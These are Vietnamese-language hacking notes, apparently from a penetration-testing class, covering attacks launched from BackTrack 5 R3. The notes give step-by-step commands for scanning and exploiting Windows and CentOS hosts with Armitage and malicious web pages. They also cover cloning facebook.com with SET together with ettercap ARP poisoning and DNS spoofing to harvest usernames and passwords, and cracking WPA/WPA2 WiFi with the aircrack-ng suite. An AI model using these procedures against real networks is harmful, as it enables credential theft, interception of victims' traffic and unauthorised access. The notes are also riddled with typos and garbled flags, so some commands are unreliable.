Tấn công local Sv 2008 +backtrack5r3 Bằng lỗi hệ điều hành +khai thác các lỗi có trên hệ điều hành -scan hệ thống =>server (linux,window) router. Swich -kiểm tra các thiiết bị ( bao gồm máy chủ, router, swich) Tiến hành tạo ra 1 trang web mã độc -lừa người dùng truy cập vào trang web chứa mã độc, sau đó cướp phiên làm việc,=>điều khiển máy bị tấn công. +lệnh dò các máy:armitage Trên máy backtrack5 R3 => cấu hình địa chỉ và kiểm tra địa chỉ IP Lệnh :ifconfig => kiểm tra địa chỉ cua backtrack Win 2008 + backtrack cùng car mạng .dãi địa chỉ cùng với backtrack=>tắt firware +trên máy backtrack thực hiện tool :armitage =>connect =>yes đang kết nối vào hệ thống +để quét hệ thống :hosts -> Nmap scan ->quick scan (os ) =>đưa dảii địa chỉ IP (172.16.0.0/24) Khi quet hết hệ điều hành.ta tìm lỗi của windown (msll)=>URIPATH=> Ddưa về root bằng ( /) +trên hệ thống sẽ tạo a 1 trang web local IP có mã độc của minhf . +làm lây nhiểm trangweb này-địa chỉ => trang web giả mạo Vd:172.16.0.200 <-> dantri.com Khi đã vào trang web có chưa mã độc thì trên hệ thôgs cuả hacker sẽ có biểu tượng khóa máy tính. Giờ ta có thể chuột phải vào máy tính để thao tác +tấn công local lan =>dạng đánh vào lỗi ứng dụng cài trên hệ điều hành.- -lỗi dịch vụ -lỗ hệ điều hành -lỗi update ứng dụng Vd:BT =>VMNet2 Centos=>vmnet2 Trên backtrack đặt cấu hình địa chỉ như sau =>ifconfig etho 192.168.1.2/24=>route ađ default gw 192.168.1.1=>ifconfig etho up=>ifconfig =trên centos cũng làm tương tự=. trên backtrack dùng =>armitage Đối với thằng cetos ta ddánh vào lỗi ứng dung, trên <> đánh firefox_xp mục đích của lỗi này khi người dùng truy cập vào FF thì nó ưu cầu người dùng insaill hg Nhớ lại đối với gmail=>ie Lừa người dùng Các bước tiến hành =>giả mạo 1 trang vd:www.facebook.com Điều hướng trang này về đia chỉ cần lắng nghe của hacker=>tiến hành nghe lén delay user bane và pass Dường dẫn:nano /etc/network/interfaces Nano /etc/resolv.conf=>8.8.8.8=>yes=>init6 Cd /pentest/exploits/set=> ./set=>yes=>3 conti=>1.socia=>=>2website=>3 credential=>1,web team (tao web) 2 ste clone (giả mạo0chọn 2=>IP add,đưa địa chỉ IP của hacker(192.168.154.136)=>to clone :www.facebook.com=>yes=>điều hướng để khi người dùng đang nhập vào trang faceb00k để chỏ về địa chỉ IP của hacker Chọn:places>home folder>file system>>usr>>local>>share>>ettercap>mở file ettr.dns để điều hướng dns. (ggiả mạo DNS) *thực hiện nghe lén : mở 1 tab khác :ettercap –T –q –I eth0 –P dns_spoof -M arp // //=> 1:tạo ra virus mà trình duyệt k diệt dc 2: nghiên cứu hack web ngoài mạng lan 3:hiểu đc cơ chế HACK WIFi Wifi:- wep -wpa -wpa2 Cơ chế: Wfi ------------------------------------------------------------------------hacker Kiểm tra lệnh car có hỗ trợ hack wifi:IWconfig Đánh wifi wap và wap 2: A,Phần cứng B.Phần mềm: cơ sở dữ liệu sqlite-3.5.7. tar.gz //từ điển Lệnh kiểm tra xem có hỗ trợ hack không?:iwconfig B1:kiểm tra car wifi trên laptop có hỗ trợ hack wifi hay không:lệnh :iwconfig =>nếu :IEEE 802/11…. Là có hỗ trợ Cai csdl sqlite-3.5.7.tar.gz Tar xvzf đường dẫn đến file csdl Vd: tar xvzf //mnt/live/dsb1/sqlite-3.5.7.tar.gz Chuyển vào thư mục giải nén :cd sqlite-3.5.7.tar.gz Kiểmt tra backtrack có cài đặt đc csdl hay khôg : ./configure –prefix=usr/local -cài đặt -make -make install Stop và start card wifi của máy laptop backtrack:airmon-ng stop tên card Vd:airmon-ng stop ath0 a vd:airmon-ng start wifi0 nhớ: card phải ở chế độ monitor mode enable kiểm tra xung quanh có những wifi nào: airodump-ng tên card airodump-ng ath0 chú ý: BSSID n:địa chỉ mac của car wifi PWR: giá trị càng cao thì càng gần C/h: kênh wifi ENC: đang mã hóa ESID: tên WIFI Khóa wifi cần hack: airodump –ng –W tên file –c số kênh --bssid Địa chỉ mac của wifi tên card Vd:airodump-ng –W hong –c 4 –bssid 00:11:22:33:44:55 ath0 ****** tạo wPa handshack bằng cahs dùng máy windown kết nối vào wifi cần hack,khi đã có wpa handshask Mở console mới Kwrite tên file Vd:kwrite essid.txt Gõ nội dung chính là tên wifi Lưu lại Tạo csdl và them tên vào csdl Airolib-ng tên csdl –import essid đường dẫn đến file Vd: airolib-ng testdb –import essid essid.txxt Them từ điển vào CSDL Airolib-ng tên csdl –import passwd đường dẫn tới file từ điển Xóa csdl trước đó : Lệnh: airolib-ng testdb –clean all Khởi tạo csdl Airolib-ng testdb –stars Airolib-ng testdb –batch Đồng bộ hóa cssdl Airolib-ng testdb –verify all Dir Xem file Giải mã :aircrack-ng –r tên csdl tên file Vidu: aircrack-ng –r testdb hong-01.cap (hên xui)